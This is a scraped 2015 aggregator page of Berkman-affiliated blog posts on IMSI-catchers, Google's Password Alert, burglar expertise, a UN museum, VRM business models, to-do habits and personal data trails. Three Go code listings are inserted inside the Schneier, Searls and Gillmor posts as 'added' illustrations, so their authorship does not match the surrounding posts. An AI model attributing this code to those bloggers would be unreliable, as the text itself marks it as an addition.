Current Berkman People and Projects

Keep track of Berkman-related news and conversations by subscribing to this page using your RSS feed reader. This aggregation of blogs relating to the Berkman Center does not necessarily represent the views of the Berkman Center or Harvard University but is provided as a convenient starting point for those who wish to explore the people and projects in Berkman's orbit. As this is a global exercise, times are in UTC.

The list of blogs being aggregated here can be found at the bottom of this page.

May 02, 2015

Bruce Schneier
The Further Democratization of Stingray

Stingray is the code name for an IMSI-catcher, which is basically a fake cell phone tower sold by Harris Corporation to various law enforcement agencies. (It's actually just one of a series of devices with fish names -- Amberjack is another -- but it's the name used in the media.) What it basically does is trick nearby cell phones into connecting to it. Once that happens, the IMSI-catcher can collect identification and location information of the phones and, in some cases, eavesdrop on phone conversations, text messages, and web browsing.

The use of IMSI-catchers in the US used to be a massive police secret. The FBI is so scared of explaining this capability in public that the agency makes local police sign nondisclosure agreements before using the technique, and has instructed them to lie about their use of it in court. When it seemed possible that local police in Sarasota, Florida, might release documents about Stingray cell phone interception equipment to plaintiffs in civil rights litigation against them, federal marshals seized the documents. More recently, St. Louis police dropped a case rather than talk about the technology in court. And Baltimore police admitted using Stingray over 25,000 times.

The truth is that it's no longer a massive police secret. We now know a lot about IMSI-catchers. And the US government does not have a monopoly over the use of IMSI-catchers. I wrote in Data and Goliath:

There are dozens of these devices scattered around Washington, DC, and the rest of the country run by who-knows-what government or organization. Criminal uses are next.

From the Washington Post:

How rife? Turner and his colleagues assert that their specially outfitted smartphone, called the GSMK CryptoPhone, had detected signs of as many as 18 IMSI catchers in less than two days of driving through the region. A map of these locations, released Wednesday afternoon, looks like a primer on the geography of Washington power, with the surveillance devices reportedly near the White House, the Capitol, foreign embassies and the cluster of federal contractors near Dulles International Airport.

At the RSA Conference last week, Pwnie Express demonstrated their IMSI-catcher detector.

Building your own IMSI-catcher isn't hard or expensive. At Def Con in 2010, researcher Chris Paget demonstrated his homemade IMSI-catcher. The whole thing cost $1,500, which is cheap enough for both criminals and nosy hobbyists.

It's even cheaper and easier now. Anyone with a HackRF software-defined radio card can turn their laptop into an amateur IMSI-catcher. And this is why companies are building detectors into their security monitoring equipment.

Two points here. The first is that the FBI should stop treating Stingray like it's a big secret, so we can start talking about policy.

The second is that we should stop pretending that this capability is exclusive to law enforcement, and recognize that we're all at risk because of it. If we continue to allow our cellular networks to be vulnerable to IMSI-catchers, then we are all vulnerable to any foreign government, criminal, hacker, or hobbyist that builds one. If we instead engineer our cellular networks to be secure against this sort of attack, then we are safe against all those attackers.


We have one infrastructure. We can't choose a world where the US gets to spy and the Chinese don't. We get to choose a world where everyone can spy, or a world where no one can spy. We can be secure from everyone, or vulnerable to anyone.

Like QUANTUM, we have the choice of building our cellular infrastructure for security or for surveillance. Let's choose security.

EDITED TO ADD (5/2): Here's an IMSI catcher for sale on At this point, every dictator in the world is using this technology against its own citizens. They're used extensively in China to send SMS spam without paying the telcos any fees. On a Food Network show called Mystery Diners -- episode 108, "Cabin Fever" -- someone used an IMSI catcher to intercept a phone call between two restaurant employees.

The new model of the IMSI catcher from Harris Corporation is called Hailstorm. It has the ability to remotely inject malware into cell phones. Other Harris IMSI-catcher codenames are Kingfish, Gossamer, Triggerfish, Amberjack and Harpoon. The competitor is DRT, made by the Boeing subsidiary Digital Receiver Technology, Inc.

EDITED TO ADD (5/2): Here's an IMSI catcher called Piranha, sold by the Israeli company Rayzone Corp. It claims to work on GSM 2G, 3G, and 4G networks (plus CDMA, of course). The basic Stingray only works on GSM 2G networks, and intercepts phones on the more modern networks by forcing them to downgrade to the 2G protocols. We believe that the more modern IMSI catchers also work against 3G and 4G networks.

by Bruce Schneier at May 02, 2015 04:22 PM

May 01, 2015

Bruce Schneier
Ears as a Biometric

It's an obvious biometric for cell phones:

Bodyprint recognizes users by their ears with 99.8% precision with a false rejection rate of only 1 out of 13.

Grip, too.

News story.

EDITED TO ADD: I blogged this in 2011.

by Bruce Schneier at May 01, 2015 07:41 PM

Protecting Against Google Phishing in Chrome

Google has a new Chrome extension called "Password Alert":

To help keep your account safe, today we're launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you've installed it, Password Alert will show you a warning if you type your Google password into a site that isn't a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here's how it works for consumer accounts. Once you've installed and initialized Password Alert, Chrome will remember a "scrambled" version of your Google Account password. It only remembers this information for security purposes and doesn't share it with anyone. If you type your password into a site that isn't a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you're at risk of being phished so you can update your password and protect yourself.

It's a clever idea. Of course it's not perfect, and doesn't completely solve the problem. But it's an easy security improvement, and one that should be generalized to non-Google sites. (Although it's not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.
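As an added illustration of the mechanism described above (this is not Google's code, and the page does not describe the extension's internals beyond "a scrambled version of your password"), here is the shape of such a check in Go. The assumptions are mine: the stored value is a salted SHA-256 of the password, the extension keeps only the last N keystrokes typed on the current page, and an allowlist of sign-in origins (here "https://accounts.google.com") is where typing the password is expected. The look-alike origin and the passphrase are constructed sample inputs.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
)

// Detector keeps a salted SHA-256 of the protected password (never the
// password itself), an allowlist of origins where typing it is expected,
// and the last few characters typed on the current page.
type Detector struct {
	salt    []byte
	digest  [32]byte
	length  int             // password length in characters
	trusted map[string]bool // origins such as "https://accounts.google.com"
	origin  string          // origin of the page currently receiving keystrokes
	tail    []rune          // trailing keystrokes, at most `length` long
}

func hashWith(salt []byte, s string) [32]byte {
	h := sha256.New()
	h.Write(salt)
	h.Write([]byte(s))
	var out [32]byte
	copy(out[:], h.Sum(nil))
	return out
}

// NewDetector runs once at setup, when the user signs in on a trusted origin;
// only the salt and the salted hash are retained afterwards (assumed design).
func NewDetector(password string, trustedOrigins ...string) (*Detector, error) {
	salt := make([]byte, 16)
	if _, err := rand.Read(salt); err != nil {
		return nil, err
	}
	d := &Detector{
		salt:    salt,
		digest:  hashWith(salt, password),
		length:  len([]rune(password)),
		trusted: map[string]bool{},
	}
	for _, o := range trustedOrigins {
		d.trusted[o] = true
	}
	return d, nil
}

// Keystroke records one typed character on the page at origin and reports
// whether the trailing characters now spell the protected password somewhere
// it should not be typed. The buffer resets when the origin changes, so a
// password split across two pages is not matched.
func (d *Detector) Keystroke(origin string, r rune) bool {
	if origin != d.origin {
		d.origin, d.tail = origin, d.tail[:0]
	}
	d.tail = append(d.tail, r)
	if len(d.tail) > d.length {
		d.tail = d.tail[len(d.tail)-d.length:]
	}
	if len(d.tail) < d.length || d.trusted[origin] {
		return false
	}
	got := hashWith(d.salt, string(d.tail))
	return subtle.ConstantTimeCompare(got[:], d.digest[:]) == 1
}

// Typed feeds a whole string one character at a time and reports whether
// any keystroke triggered the alert.
func (d *Detector) Typed(origin, text string) bool {
	alerted := false
	for _, r := range text {
		if d.Keystroke(origin, r) {
			alerted = true
		}
	}
	return alerted
}

func main() {
	d, err := NewDetector("correct horse battery", "https://accounts.google.com")
	if err != nil {
		panic(err)
	}
	fmt.Println("real sign-in page:", d.Typed("https://accounts.google.com", "correct horse battery"))
	fmt.Println("look-alike page  :", d.Typed("https://accounts-google.example", "correct horse battery"))
	fmt.Println("unrelated text   :", d.Typed("https://example.com", "meeting at 3pm"))
}
```

Two properties worth noting. The check fires only once the full password has been typed on the untrusted page, so it is detection after the fact, not prevention: the phishing page already has the keystrokes, and the value of the alert is that the user can rotate the password immediately. And comparing a hash of the trailing window, rather than the password, means a compromise of the extension's storage yields a salted hash rather than the plaintext.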

Slashdot thread.

EDITED TO ADD: It's not even a day old, and there's an attack.

by Bruce Schneier at May 01, 2015 02:52 AM

April 30, 2015

Bruce Schneier
Measuring the Expertise of Burglars

New research paper: "New methods for examining expertise in burglars in natural and simulated environments: preliminary findings":

Expertise literature in mainstream cognitive psychology is rarely applied to criminal behaviour. Yet, if closely scrutinised, examples of the characteristics of expertise can be identified in many studies examining the cognitive processes of offenders, especially regarding residential burglary. We evaluated two new methodologies that might improve our understanding of cognitive processing in offenders through empirically observing offending behaviour and decision-making in a free-responding environment. We tested hypotheses regarding expertise in burglars in a small, exploratory study observing the behaviour of 'expert' offenders (ex-burglars) and novices (students) in a real and in a simulated environment. Both samples undertook a mock burglary in a real house and in a simulated house on a computer. Both environments elicited notably different behaviours between the experts and the novices with experts demonstrating superior skill. This was seen in: more time spent in high value areas; fewer and more valuable items stolen; and more systematic routes taken around the environments. The findings are encouraging and provide support for the development of these observational methods to examine offender cognitive processing and behaviour.

The lead researcher calls this "dysfunctional expertise," but I disagree. It's expertise.

Claire Nee, a researcher at the University of Portsmouth in the U.K., has been studying burglary and other crime for over 20 years. Nee says that the low clearance rate means that burglars often remain active, and some will even gain expertise in the crime. As with any job, practice results in skills. "By interviewing burglars over a number of years we've discovered that their thought processes become like experts in any field, that is they learn to automatically pick up cues in the environment that signify a successful burglary without even being aware of it. We call it 'dysfunctional expertise,'" explains Nee.

See also this paper.

by Bruce Schneier at April 30, 2015 07:22 PM

David Weinberger
A UN museum?

I got to spend yesterday with an awesome group of about twenty people at the United Nations, brainstorming what a UN museum might look like. This was under the auspices of the UN Live project which (I believe) last week was endorsed by UN Secretary General Ban Ki-moon.

Some of the people at the meeting
Some of us

Although it was a free-ranging discussion from many points of view, there seemed to be general implicit agreement about a few points. (What the UN Live group does with this discussion is up to them, of course.)

Security Council
Where we did not meet

First, there was no apparent interest in constructing a museum that takes telling the UN’s story as its focus. Rather, the discussion was entirely about ways in which the values of the UN could be furthered by enabling people to connect with one another around the world.

Second, No one even considered the possibility that it might be only a physical museum. Physical elements were part of many of the ideas, but primarily to enable online services.

Here are some of the ideas that I particularly liked, starting (how rude!) with mine.

I stole it directly from a Knight Foundation proposal by my friend Nate Hill at Chattanooga Public Library. He proposed setting up 4K displays in a few libraries that have gigabit connections, to enable local residents to interact with one another. At the meeting yesterday I suggested (crediting Nate, but probably too fast for anyone to hear me, so I’m clear, right?) that the Museum be distributed via “magic mirrors” – Net-connected video monitors – that connect citizens globally. These would go into libraries and other safe spaces where there can be facilitators. (We’re all local people, so we need help talking globally.) Where possible, there might be two screens so that people can see themselves and the group they’re talking with. (For some reason, I like the idea of the monitors being circular. More like portals.)

These magic mirrors would be a platform for activities to be invented. For example:

  • Kids could play together. Virtual Jenga? Keep a virtual ball afloat? (Assume Kinect-like sensors.) Collaborative virtual jigsaw puzzle of a photo of one of their home towns? Or maybe each group is working collaboratively on one puzzle, but each team’s pieces are part of the image of the other’s team’s home. A simple mirror imitation game where each kid mimics the other’s movements? It’s a platform, so it’d be open to far better ideas than these.

  • Kids could create together. Collaborative drawing? Collaborative crazy machines a la Rube Goldberg?

  • Real-time, video AMAs: “We’re Iranian parents. AUA [ask us anything] at 10am EDT.”

  • Listings for other activities, including those proposed below.

Someone suggested that the UN create pop-up museums by bringing in a shipping container stocked with media tools. (Technically, a plop-down museum, it seems to me.) The local community would be invited to tell its story, perhaps in 100 images (borrowing the British Museum’s “A History of the World in 100 Objects”), or perhaps by providing a StoryCorps-style recording booth. Or send the kids out with video cameras. (There might have to be someone who could help with the media.) The community would be able to tell its story to the world. The world could react and interact. (These containers could contain magic mirrors.)

Another idea: Facilitate local people coming together virtually to share solutions to common problems, building on the multiple and admirable efforts to do this already.

Another idea: One group pointed out that museums typically face backwards in time. So suppose the UN museum instead constructed itself in real time as significant events occurred. E.g., as an earthquake disaster unrolls, the UN Museum would track it live, presenting its consequences intimately to the world, recording it for posterity, and facilitating relief efforts.

There was general agreement, I believe, that all of the UN Museum’s content should be openly available through APIs.

There were many, many more ideas, many of which I find exciting. I don’t know if any of the ideas discussed are going to make it past the cool-way-to-spend-an-afternoon phase, but I am thrilled by the general prospect of a UN Museum that takes as its mission not just the curation of artifacts that tell a story but advancing the UN’s mission by connecting people globally around common concerns, shared interests, and a desire to help and delight one another.

Now go ahead and be cynical and snarky.

The post A UN museum? appeared first on Joho the Blog.

by davidw at April 30, 2015 07:13 PM

The Birth of Rice-A-Roni and the Power of Podcasts

This week, as people observe the 100th anniversary of the Armenian Genocide, the Fugitive Waves podcast published a story about Rice-A-Roni. The genocide and the ubiquitous rice mix are linked in an unexpected way: A young couple rent a room from an old Armenian woman. The older woman, Pailadzou Captanian, teaches her young, pregnant tenant how to cook, and shares her personal stories of the Armenian tragedy – stories that she published in a book decades earlier. From these kitchen sessions comes a delicious pilaf that eventually becomes Rice-A-Roni.

Read more and view photos.

Nikki Silva of The Kitchen Sisters, which produces Fugitive Waves, shared some thoughts about the piece:

“The Birth of Rice-A-Roni” was originally a shorter piece for NPR’s Morning Edition. It absolutely killed us that we couldn’t include more than a quick mention of Mrs. Captanian and her rare eyewitness account. I’ve been sitting here listening back to the tapes and crying – because of the stories, but also because it’s taken us so long to get them out there. So, finally, we’re able to include extended interviews with the librarian in Germany who translated the book, and with Mrs. Captanian’s grandson, and can begin to piece together the story of this woman’s experiences and accomplishments.

Hooray for podcasts!

Hooray, indeed. Listen to the episode, and subscribe to Fugitive Waves. Listen to all the Radiotopia shows at

The post The Birth of Rice-A-Roni and the Power of Podcasts appeared first on PRX.

by Rekha at April 30, 2015 02:54 PM

Joseph Reagle
The Conversation Newbie

On the recommendation of my colleague Matt Nisbet, I submitted a piece related to Reading the Comments to The Conversation, an online publisher aiming for the sweet spot of "academic rigor, journalist flair." The result is the short essay "The Social Graph Won't Save Us from What's Wrong with Online Reviews."

As someone who typically chafes at most publishing processes (submitting Word documents via crappy Web forms), I found this to be delightful! The process is very web friendly: I got to write in markdown (how I write everything) and links are welcome, as are images. The results are available under the Creative Commons Attribution/No derivatives license and they encourage syndication. My editor (Maggie Villiger) was helpful and responsive.

I highly recommend it, and I share these lessons I learned as a newbie:

  • I recommend you have a markdown editor you are comfortable with. The online editor is okay, but switching between the source and preview tabs is a little awkward.
  • They seem to prefer inline to reference links; I find that makes the prose busy for editing purposes, but it's easy enough to convert between the two with pandoc.
  • Have some creative commons images in mind for the piece; I make much use of Wikimedia Commons and flickr.
  • Authors have final control over publishing, it won't post until you press "Approve" upon request by your editor. That said, it was a little confusing in that I approved working versions that I wanted to save (and get feedback on) but not really approve for publishing.

by Joseph Reagle at April 30, 2015 04:00 AM

April 29, 2015

Of vaults and honey pots

Personal Blackbox is a new #VRM company — or so I gather, based on what they say they offer to users: “CONTROL YOUR DATA & UNLOCK ITS VALUE.”

So you’ll find them listed now on our developers list.

Here is the rest of the text on their index page:


PBB is a technology platform that gives you control of the data you produce every day.

PBB lets you gain insights into your own behaviors, and make money when you choose to give companies access to your data. The result? A new and meaningful relationship between you and your brands.

At PBB, we believe people have a right to own their data and unlock its benefits without loss of privacy, control and value. That’s why we created the Personal Data Independence Trust. Take a look and learn more about how you can own your data and its benefits.

In the meantime we are hard at work to provide you a service and a company that will make a difference. Join us to participate and we will keep you posted when we are ready to launch.

That graphic, and what seems to be said between the lines, tells me Personal Blackbox’s customers are marketers, not users.  And, as we so often hear, “If the service is free, you’re the product being sold.”

But, between the last paragraph and this one, I ran into Patrick Deegan, the Chief Technology Officer of Personal Blackbox, at the PDNYC meetup. When I asked him if the company’s customers are marketers, he said no — and that PBB (as it’s known) is doing something much different that’s not fully explained by the graphic and text above, and is tied with the Personal Data Independence Trust, about which not much is said at the link to it. So I’ll withhold any more judgement about it until I know more, and instead pivot to the subject of VRM business models, which that graphic brings up for me.

I see two broad ones, which I’ll call vault and honey pot.

The vault model gives the individual full control over their personal data and what’s done with it, which could be anything, for any purpose. That data primarily has use value rather than sale value.

The honey pot model also gives the individual control over their personal data, but mostly toward providing a way to derive sale value for that data (or something similar, such as bargains and offers from marketers).

The context for the vault model is the individual’s whole life, and selective sharing of data with others.

The context for the honey pot model is the marketplace for qualified leads.

The honey pot model goes after low-hanging fruit. It’s also where all the money is, at least for now. The path to market success is a lot faster in the short run if you find new ways to help sellers sell.  $zillions are being spent on that, all the time. (Just look at the advertising coming along with that last link, to a search).

The vault model goes after the whole world of individuals. Being customers, or consumers, is just one of the many roles we play in that world. Who we are and what we do — embodied in our data — is infinitely larger than what’s valuable to marketers. But there’s not much money in that yet.

I also think the heart of VRM is in the vault model. But we have a big tent here, and many paths to explore. (And many metaphors to mix.)

by Doc Searls at April 29, 2015 03:40 PM

Nick Grossman
Anti-workflow: to-dos

A while back, I wrote about Anti-Workflow Apps — apps that solve problems for you without forcing you to adopt a workflow that you may never fully be able to adopt.  Workflow apps (CRMs, to-do lists, project management tools) are super hard to drive adoption towards, as everyone works differently and really resists this kind of change.  (of course, it’s possible when the reward is super good — e.g., slack and git/github — but those times are rare and more often than not an attempted re-workflow goes splat)

So I’ve been on the lookout for Anti-Workflow tools.  Solutions that solve a problem that you think requires a new workflow, but may actually be more effectively solved another, more clever way.  Today I want to talk about to-dos, because I seem to have found my own personal anti-workflow solution.

I’ve always struggled with to-dos — I’ve used every to-do management tool on earth, and have never been able to adopt a workable, effective system.  I’ve tried everything from complicated tracking systems like OmniFocus to simple to-do lists of every possible flavor.  Nothing has stuck.  For years and years, I kept trying, trying and trying again.

In the end, I just gave up and said, fuck it, I’m not using a to-do list anymore. Not going to even try.

What happened was that I ended up keeping track of my priorities in a totally different way — a way that was actually more in tune with my existing workflows.  One part of the solution was pretty obvious, and one was surprising.

On the obvious side: the calendar.  For things that I absolutely must do, and that require dedicated time, I just use my calendar.  I’m in my calendar all day long, so it’s the perfect place to block out time for important things.  So now I set calendar entries for myself, to make sure I set aside time for things that need focus.

The calendar is good for things I know I need to do, and that I know are important.  What it’s not good for is capturing notes, ideas, and small to dos, which often just need to be captured in the moment and prioritized & dealt with (or not) later.  This is the use case that has always drawn me back to to-do apps, to no avail.

In particular, the really bad thing about a to-do list for this use case is that all it does is make you feel guilty.  Items get added to the list, and whether you really need to do them or not, you feel drawn to.  And then when it doesn’t happen the to-do list just becomes a giant pile of guilt that you do your best to ignore (that’s what happens to me at least).

That brings us to the less obvious solution.  What I’ve found is that a great way to handle both the capture / prioritization issue and the guilt issue is to use a Sparkfile.  Long time readers will know that this blog is named after my favorite idea from Steven Johnson’s Where Good Ideas Come From: the “slow hunch” approach to developing ideas.  Another idea from that book — unearthed by studying epic thinkers of the past like Darwin and DaVinci — is the Sparkfile: a long, running list of thoughts & ideas.  Fragments that pile on one another over time. One way to cultivate the slow hunch is not only to keep a sparkfile (in addition to other kinds of journals), but to constantly pore back through it re-reading and reconsidering your previous thoughts, ideas and observations.

Turns out that this is also a pretty good way to filter inbound ideas of things to do.  Just add them to the spark file, continually review the list, and occasionally do things (immediately or via calendar), and then add new stuff to the top as you think of more things.  No pressure — and absolutely no expectation — to do everything on the list or turn it into a perfect set of priorities.  Just let the mind run, capturing as you go.

For me, this idea ties back into anti-workflow because I’ve been keeping a personal blog/journal for about 7 years now.  Which was in many ways a sparkfile, though it started out slightly more long form (starting with a private wordpress blog).  The big revolution happened last fall, when I switched over to using Diaro.  Diaro is a personal journal tool, with both a desktop web client as well as a mobile app.  The mobile app is the key, as it makes it possible to really quickly jot down a thought — as quickly as you’d do on a to-do app, or email, or notepad.

So in the end, the solution to my to-do workflow was not to add a new to-do workflow.  Rather, it was to extend the workflows I already had going, calendars and the sparkfile.  Boy it feels good.

by Nick Grossman at April 29, 2015 02:26 PM

Toward VRooMy privacy policies

In The nightmare of easy and simple, T.Rob unpacks the can of worms that is:

  1. one company’s privacy policy,
  2. provided by another company’s automatic privacy policy generating system, which is
  3. hosted at that other company, and binds you to their privacy policy, which binds you to
  4. three other companies’ privacy policies, none of which assure you of any privacy, really. Then,
  5. the last of these is Google’s, which “is basically summed up as ‘we own your ass'” — and worse.

The company was GeniCan — a “smart garbage can” in the midst of being crowdfunded. GeniCan, like so many other connected devices, lives in the Internet of Things, or IoT. After exploring some of the many ways that IoT is already FUBAR in the privacy realm, T.Rob offers some constructive help:

The VRM Version
There is a possible version of this device that I’d actually use.  It would be the one with the VRM-y personal cloud architecture.  How does that work?  Same architecture I described in San Francisco:

  • The device emits signed data over pub/sub so that secondary and tertiary recipients of data can trust it.

  • By default, the device talks to the vendor’s service so users don’t need any other service or device to make it work.

  • The device can be configured to talk to a service of the user’s choosing instead of, or in addition to that of the manufacturer.

  • The device API is open.

Since privacy policy writing for IoT is pretty much a wide-open greenfield, that provides a helpful starting point. It will be good to see who picks up on it, and how.
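The first of T.Rob's four points (signed data over pub/sub, so that recipients who did not talk to the device directly can still trust it) is the one with a concrete cryptographic shape, so here is an added example of it in Go. This is illustrative code, not GeniCan's or T.Rob's, and the message format, device naming and Ed25519 choice are all assumptions: the device signs the exact bytes it publishes, and any subscriber, whether the vendor's service or one the user chose, verifies with nothing but the device's public key. The readings are constructed sample values.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// Reading is what the device publishes (field names are assumptions).
type Reading struct {
	Device string `json:"device"`
	Seq    uint64 `json:"seq"`
	Time   int64  `json:"time"`
	Grams  int    `json:"grams"`
}

// Envelope is the message on the bus: the exact bytes that were signed plus
// the signature. Signing the bytes rather than the struct avoids JSON
// canonicalization problems; every recipient verifies what the device emitted.
type Envelope struct {
	Payload   []byte `json:"payload"`
	Signature []byte `json:"signature"`
}

// Device holds the private key, which never leaves the device.
type Device struct {
	id   string
	priv ed25519.PrivateKey
	seq  uint64
}

func NewDevice(id string) (*Device, ed25519.PublicKey, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	return &Device{id: id, priv: priv}, pub, nil
}

// Publish builds the next signed message. A monotonic sequence number lets
// each subscriber refuse replays with no shared state between subscribers.
func (d *Device) Publish(grams int, unixTime int64) (Envelope, error) {
	d.seq++
	payload, err := json.Marshal(Reading{Device: d.id, Seq: d.seq, Time: unixTime, Grams: grams})
	if err != nil {
		return Envelope{}, err
	}
	return Envelope{Payload: payload, Signature: ed25519.Sign(d.priv, payload)}, nil
}

// Subscriber is any recipient: the vendor's service, a service the user
// chose, or a party that got the message second-hand. It needs only the
// device's public key, distributed out of band (e.g. printed on the device).
type Subscriber struct {
	keys    map[string]ed25519.PublicKey
	lastSeq map[string]uint64
}

func NewSubscriber(keys map[string]ed25519.PublicKey) *Subscriber {
	return &Subscriber{keys: keys, lastSeq: map[string]uint64{}}
}

// Accept verifies the signature and sequence number before returning the reading.
func (s *Subscriber) Accept(env Envelope) (Reading, error) {
	var r Reading
	if err := json.Unmarshal(env.Payload, &r); err != nil {
		return r, err
	}
	pub, ok := s.keys[r.Device]
	if !ok {
		return r, errors.New("unknown device: " + r.Device)
	}
	if !ed25519.Verify(pub, env.Payload, env.Signature) {
		return r, errors.New("signature does not verify")
	}
	if r.Seq <= s.lastSeq[r.Device] {
		return r, errors.New("replayed or out-of-order message")
	}
	s.lastSeq[r.Device] = r.Seq
	return r, nil
}

func main() {
	dev, pub, err := NewDevice("can-0001")
	if err != nil {
		panic(err)
	}
	keys := map[string]ed25519.PublicKey{"can-0001": pub}
	vendor, userCloud := NewSubscriber(keys), NewSubscriber(keys)
	env, _ := dev.Publish(1200, 1430000000)
	fmt.Println(vendor.Accept(env))    // vendor's service verifies
	fmt.Println(userCloud.Accept(env)) // the user's own service verifies independently
	_, err = userCloud.Accept(env)
	fmt.Println("replay:", err)
	// Flipping the last digit of the payload (1200 -> 1201 grams) breaks the signature.
	tampered := Envelope{Payload: append([]byte{}, env.Payload...), Signature: env.Signature}
	tampered.Payload[len(tampered.Payload)-2] ^= 1
	_, err = vendor.Accept(tampered)
	fmt.Println("tampered:", err)
}
```

The design choice that matters for T.Rob's third point (pointing the device at a service of the user's choosing) is that the vendor is just another subscriber here: nothing in the verification depends on the vendor's infrastructure, so a user-run service, or a third party the user forwards data to, gets the same assurance from the same bytes.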

by Doc Searls at April 29, 2015 02:08 PM

Bruce Schneier
Remote Proctoring and Surveillance

Interesting article. There are a lot of surveillance and privacy issues at play here.

by Bruce Schneier at April 29, 2015 11:12 AM

April 28, 2015

Dan Gillmor - Mediactive
Some other media I create…

A few weeks ago I asked my Digital Media Literacy students to write a blog post about the media they create on a routine basis — email, social media, blogs, phone photos, etc. I wrote a post of my own as an example.

What I didn’t mention in my instructions was another kind of media we create: data that we don’t realize we’re creating, and which we largely don’t control. Here’s an attempt to quantify at least some of that.

When we take a photo with a typical mobile phone camera app, a lot more data get created than just the JPEG file that contains the picture itself. The phone, depending on the hardware and settings, stores some or all of the following: the location where the picture was taken; the time and date it was taken; what compass direction the camera was pointing; whether the phone was moving; and more.
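To make that concrete, here is an added example (not part of Dan Gillmor's post) of reading the location back out of a photo's EXIF metadata in Go. Cameras store it as a TIFF structure inside a JPEG APP1 segment prefixed "Exif\0\0"; the code below parses that structure's GPS IFD, which holds latitude and longitude as degree/minute/second rationals plus N/S and E/W reference letters. The input is a constructed sample block (not from a real camera) that encodes 42°21'36"N 71°6'0"W; the tag numbers and type codes are the standard EXIF ones. Removing the whole APP1 segment from the file is what "stripping EXIF" means in practice.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// EXIF/TIFF tag numbers and type codes from the specification.
const tagGPSInfo, tagLatRef, tagLat, tagLongRef, tagLong = 0x8825, 1, 2, 3, 4
const typeASCII, typeLong, typeRational = 2, 4, 5

type GPS struct{ Lat, Long float64 }

// entry is one IFD record; raw is its 4-byte value-or-offset field.
type entry struct {
	typ   uint16
	count uint32
	raw   []byte
}

// readIFD returns the bounds-checked entries of the IFD at off, keyed by tag.
func readIFD(tiff []byte, bo binary.ByteOrder, off uint32) (map[uint16]entry, error) {
	start := int(off) + 2
	if start > len(tiff) || start+12*int(bo.Uint16(tiff[off:])) > len(tiff) {
		return nil, errors.New("IFD out of range")
	}
	es := map[uint16]entry{}
	for i := 0; i < int(bo.Uint16(tiff[off:])); i++ {
		e := tiff[start+12*i:]
		es[bo.Uint16(e)] = entry{bo.Uint16(e[2:]), bo.Uint32(e[4:]), e[8:12]}
	}
	return es, nil
}

// dms converts three RATIONALs (degrees, minutes, seconds) at off to decimal degrees.
func dms(tiff []byte, bo binary.ByteOrder, off uint32) (float64, error) {
	if int(off)+24 > len(tiff) {
		return 0, errors.New("rational data out of range")
	}
	deg := 0.0
	for i, scale := range []float64{1, 60, 3600} {
		num, den := bo.Uint32(tiff[int(off)+8*i:]), bo.Uint32(tiff[int(off)+8*i+4:])
		if den == 0 {
			return 0, errors.New("zero denominator")
		}
		deg += float64(num) / float64(den) / scale
	}
	return deg, nil
}

// ParseGPS reads the GPS IFD of a TIFF structure (what follows "Exif\0\0" in
// a JPEG APP1 segment) and returns signed decimal degrees.
func ParseGPS(tiff []byte) (GPS, error) {
	if len(tiff) < 8 {
		return GPS{}, errors.New("short TIFF header")
	}
	var bo binary.ByteOrder = binary.LittleEndian // "II"
	if string(tiff[:2]) == "MM" {
		bo = binary.BigEndian
	} else if string(tiff[:2]) != "II" {
		return GPS{}, errors.New("unknown byte order")
	}
	ifd0, err := readIFD(tiff, bo, bo.Uint32(tiff[4:]))
	if err != nil {
		return GPS{}, err
	}
	p, ok := ifd0[tagGPSInfo]
	if !ok || p.typ != typeLong {
		return GPS{}, errors.New("no GPS IFD")
	}
	gps, err := readIFD(tiff, bo, bo.Uint32(p.raw))
	if err != nil {
		return GPS{}, err
	}
	coord := func(refTag, valTag uint16, neg byte) (float64, error) {
		ref, val := gps[refTag], gps[valTag]
		if ref.typ != typeASCII || val.typ != typeRational || val.count != 3 {
			return 0, errors.New("missing or malformed GPS tag")
		}
		v, err := dms(tiff, bo, bo.Uint32(val.raw))
		if ref.raw[0] == neg { // ASCII values of 4 bytes or fewer are stored inline in the field
			v = -v
		}
		return v, err
	}
	lat, err := coord(tagLatRef, tagLat, 'S')
	if err != nil {
		return GPS{}, err
	}
	long, err := coord(tagLongRef, tagLong, 'W')
	return GPS{lat, long}, err
}

// sampleTIFF is a constructed little-endian EXIF block (not camera output) whose
// GPS IFD records 42°21'36"N 71°6'0"W. Offsets: IFD0 at 8, GPS IFD at 26, rationals at 80 and 104.
func sampleTIFF() []byte {
	var b bytes.Buffer
	w := func(vals ...interface{}) {
		for _, v := range vals {
			binary.Write(&b, binary.LittleEndian, v)
		}
	}
	b.WriteString("II")
	w(uint16(42), uint32(8))
	w(uint16(1), uint16(tagGPSInfo), uint16(typeLong), uint32(1), uint32(26), uint32(0))
	w(uint16(4), uint16(tagLatRef), uint16(typeASCII), uint32(2), [4]byte{'N'})
	w(uint16(tagLat), uint16(typeRational), uint32(3), uint32(80))
	w(uint16(tagLongRef), uint16(typeASCII), uint32(2), [4]byte{'W'})
	w(uint16(tagLong), uint16(typeRational), uint32(3), uint32(104), uint32(0))
	w([]uint32{42, 1, 21, 1, 36, 1, 71, 1, 6, 1, 0, 1})
	return b.Bytes()
}

func main() {
	fmt.Println(ParseGPS(sampleTIFF()))
}
```

Every offset in an IFD is attacker-controlled when the file comes from outside, which is why each read above is bounds-checked before it happens; EXIF parsers that skip that step are a recurring source of crashes and worse in image-handling code.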

Mobile apps in general frequently generate and save — often on remote computers — all kinds of things including location. They copy our contacts’ information. They look at our calendars. They check our phone numbers, the calls we’ve made, duration of the calls, etc.

I consider this kind of collection to be just short of spyware territory. The clock app in my phone has absolutely no legitimate reason to know my phone number and calls, yet it demands that permission. I block that kind of stuff–something I can do because I run an operating system called Cyanogenmod, which has fairly granular permission settings, unlike most mobile operating systems.

I create “cookies” on my computers (laptop, phone, etc.) when I visit other people’s sites and services. Cookies are used for many purposes, including identifying me for return visits, but also to create ways to track what I do.

Using the Web in general is an exercise in being spied on — it’s the fundamental business model for all of the “free” services such as Facebook and Google, as well as countless others. My visits to other people’s sites enable them to create all kinds of usage data on their own servers, not just on my computers.

